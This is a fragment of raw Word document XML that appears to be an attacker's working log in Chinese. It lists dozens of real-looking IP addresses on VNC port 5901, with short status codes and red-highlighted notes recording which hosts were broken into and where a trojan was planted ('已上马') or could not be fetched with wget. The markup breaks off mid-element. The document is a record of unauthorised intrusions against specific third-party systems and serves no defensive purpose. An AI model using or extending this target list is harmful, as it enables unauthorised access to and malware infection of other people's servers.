    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">116.254.195.106:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos</w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已搞定</w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>无法</w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="00956BE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>116.254.207.26:5901</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法重启</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是手工查找的一部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.0.185:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.0.148:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.78.2.213:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">118.26.200.3:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.26.201.207:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.195.132.173:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.0.79.253:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.0.79.251:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.13.69.68:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>安装不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.13.2.200:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.13.2.201:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.224.223.231:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F03078">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>redhat success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.172.125.2:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.172.125.3:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.171.0.97:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.171.1.10:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>无法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.63.76.93:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">183.63.252.162:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">203.135.164.42:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.103.3.28:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>android</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.7.38.22:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.24.71.101:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.25.2.24:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.26.109.69:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3582"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">218.28.153.41:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71264">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.28.153.37:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.226.70:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.242.107:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.20:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.22:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="002943E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>已上马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.21:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.26:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.28:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.149.150.11:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.163.123.22:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.243.1.97:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.248.36.55:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.7.13.53:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.79.84:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.203.144:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.174.24.116:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.29:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.35:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.193.102:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.13.129.161:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.247:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">221.238.22.243:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windws</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.244:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.245:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.34.7.163:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.56:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.46:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.191.239.36:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">60.191.239.58:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.47.77:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.208.46:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.208.53:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.131.241.220:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>61.184.203.136:5901</w:t>
      </w:r>
      <w:r w:rsidRPr="0012613C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0012613C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>centos success</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">61.184.192.35:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">110.4.135.41:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日本服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.1.15.115:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.115.71:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.152:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.156:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.117.28:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.116.157:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.4.117.26:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">111.11.181.192:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.12.44.71:5901 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">111.13.124.219:5901 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D6DC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Redhat success</w:t>
      </w:r>
      <w:r>
